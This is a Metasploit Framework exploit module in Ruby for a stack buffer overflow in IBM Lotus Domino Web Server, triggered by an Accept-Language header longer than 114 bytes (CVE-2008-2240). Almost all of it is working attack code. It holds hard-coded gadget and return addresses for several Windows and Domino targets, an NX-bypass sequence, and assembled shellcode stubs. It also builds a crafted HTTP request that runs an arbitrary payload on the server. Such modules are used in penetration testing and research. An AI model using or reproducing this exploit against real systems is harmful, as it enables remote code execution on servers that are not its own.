IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow



##

# $Id: domino_http_accept_language.rb 10998 2010-11-11 22:43:22Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = AverageRanking

    include Msf::Exploit::Remote::HttpClient

    def initialize(info = {})
        super(update_info(info,
            'Name'            => 'IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow',
            'Description'        => %q{
                    This module exploits a stack buffer overflow in IBM Lotus Domino Web Server
                prior to version 7.0.3FP1 and 8.0.1. This flaw is triggered by any HTTP
                request with an Accept-Language header greater than 114 bytes.
            },
            'Author'        => [ 'Fairuzan Roslan riaf[at]mysec.org', 'Earl Marcus klks[at]mysec.org' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 10998 $',
            'References'        =>
                [
                    ['CVE', '2008-2240'],
                    ['OSVDB', '45415'],
                    ['BID', '29310'],
                    ['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21303057'],
                ],
            'DefaultOptions'    =>
                {
                    'EXITFUNC'    => 'thread',
                },
            'Privileged'        => true,
            'Payload'        =>
                {
                    'Space'            => 800,
                    'BadChars'        => "\x00\x0a\x20\x2c\x3b",
                    'StackAdjustment'    => -3500,
                },
            'Platform'        =>    'win',
            'Targets'        =>
                [

                    ['Lotus Domino 7.0 on Windows 2003 SP1 English(NX)',
                        {
                            'FixESP'    => 0x70335c79, # add esp, 0x324, ret         @fontmanager.dll
                            'FixESI'    => 0x603055da, # push esp, pop esi, ret        @nnotes.dll
                            'FixEBP'    => 0x60a8bc90, # push esp, pop ebp, ret 0x10    @nnotes.dll
                            'Ret'        => 0x62c838c7, # ret 0x12e            @nlsccstr.dl
                            'DisableNX'    => 0x7c83e413, # NX Disable            @ntdll.dll
                            'JmpESP'    => 0x62c6072e, # jmp esp            @nlsccstr.dll
                        }
                    ],

                    ['Lotus Domino 7.0 on Windows 2003 SP2 English(NX)',
                        {
                            'FixESP'    => 0x70335c79, # add esp, 0x324, ret         @fontmanager.dll
                            'FixESI'    => 0x603055da, # push esp, pop esi, ret        @nnotes.dll
                            'FixEBP'    => 0x60a8bc90, # push esp, pop ebp, ret 0x10    @nnotes.dll
                            'Ret'        => 0x62c838c7, # ret 0x12e            @nlsccstr.dll
                            'DisableNX'    => 0x7c83f517, # NX Disable            @ntdll.dll
                            'JmpESP'    => 0x62c6072e, # jmp esp            @nlsccstr.dll
                        }
                    ],

                    ['Lotus Domino 7.0 on Windows 2003/2000/XP English(NO NX)',
                        {
                            'FixESP'    => 0x70335c79, # add esp, 0x324, ret         @fontmanager.dll
                            'JmpESP'    => 0x62c6072e, # jmp esp            @lsccstr.dll
                        }
                    ],

                    ['Lotus Domino 8.0 on Windows 2003 SP1 English(NX)',
                        {
                            'FixESP'    => 0x7ea0615c, # add esp, 0x324, ret        @net.dll
                            'FixESI'    => 0x639a7f87, # push esp, pop esi, ret        @nlsccstr.dll
                            'FixEBP'    => 0x6391c9f7, # push esp, pop ebp, ret 0x10    @nlsccstr.dll
                            'Ret'        => 0x7f8b0628, # ret 0x12e            @j9gc23.dll
                            'DisableNX'    => 0x7c83e413, # NX Disable            @ntdll.dll
                            'JmpESP'    => 0x6391071e, # jmp esp             @nlsccstr.dll
                        }
                    ],

                    ['Lotus Domino 8.0 on Windows 2003 SP2 English(NX)',
                        {
                            'FixESP'    => 0x7ea0615c, # add esp, 0x324, ret        @net.dll
                            'FixESI'    => 0x639a7f87, # push esp, pop esi, ret        @nlsccstr.dll
                            'FixEBP'    => 0x6391c9f7, # push esp, pop ebp, ret 0x10    @nlsccstr.dll
                            'Ret'        => 0x7f8b0628, # ret 0x12e            @j9gc23.dll
                            'DisableNX'    => 0x7c83f517, # NX Disable            @ntdll.dll
                            'JmpESP'    => 0x6391071e, # jmp esp            @nlsccstr.dll
                        }
                    ],

                    ['Lotus Domino 8.0 on Windows 2003/2000/XP English(NO NX)',
                        {
                            'FixESP'    => 0x7ea0615c, # add esp, 0x324, ret        @net.dll
                            'JmpESP'    => 0x6391071e, # jmp esp            @nlsccstr.dll
                        }
                    ],

                ],
            'DisclosureDate' => 'May 20 2008'))

        register_options( [ Opt::RPORT(80) ], self.class )
    end

    def exploit
        connect

        lang = rand_text_alphanumeric(116)                # greetz to hateful chris
        lang[ 56,  4 ] = [ 0xfffffffe ].pack('V')            # Fix Second crash (esi)
        lang[ 68,  4 ] = [ 0x7ffaf0ec ].pack('V')            # Fix Second crash (eax)
        lang[ 104, 4 ] = [ 0x7ffaf030 ].pack('V')            # Fix First crash
        lang[ 112, 4 ] = [target['FixESP']].pack('V')            # 1
        lang << "\x00"
        lang << payload.encoded

        if(not target['DisableNX'])
            lang[ 16, 15 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xc4 pop edi sub edi,-0x86 call edi").encode_string        # 4
            lang[ 80,  4 ] = [target['JmpESP']].pack('V')        # 2
            lang[ 84,  2 ] = Rex::Arch::X86.jmp_short(-0x46)    # 3 jmp back to top
        else
            lang[ 16, 16 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xd8 pop edi pop edi sub edi,-0x86 call edi").encode_string    # 8
            lang[ 80,  4 ] = [target['FixESI']].pack('V')        # 2
            lang[ 84,  4 ] = [target['FixEBP']].pack('V')        # 3
            lang[ 88,  4 ] = [target['Ret']].pack('V')        # 4
            lang[ 92,  4 ] = [target['JmpESP']].pack('V')        # 6
            lang[ 100, 2 ] = Rex::Arch::X86.jmp_short(-0x56)    # 7  jmp back to top
            lang[ 108, 4 ] = [target['DisableNX']].pack('V')    # 5
        end

        uri = rand_text_alpha_lower(16) + '.nsf?' + rand_text_highascii(1)    # Trigger

        print_status("Trying target #{target.name}...")
        send_request_raw({
                        'uri'            => "#{uri}",
                        'method'        => 'GET',
                        'headers'        =>
                        {
                            'Accept'        => '*/*',
                            'Accept-Language'    => "#{lang}",
                            'Accept-Encoding'    => 'gzip,deflate',
                            'Keep-Alive'        => '300',
                            'Connection'        => 'keep-alive',
                            'User-Agent'        => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
                        }
                    }, 5)
        handler
        disconnect
    end
end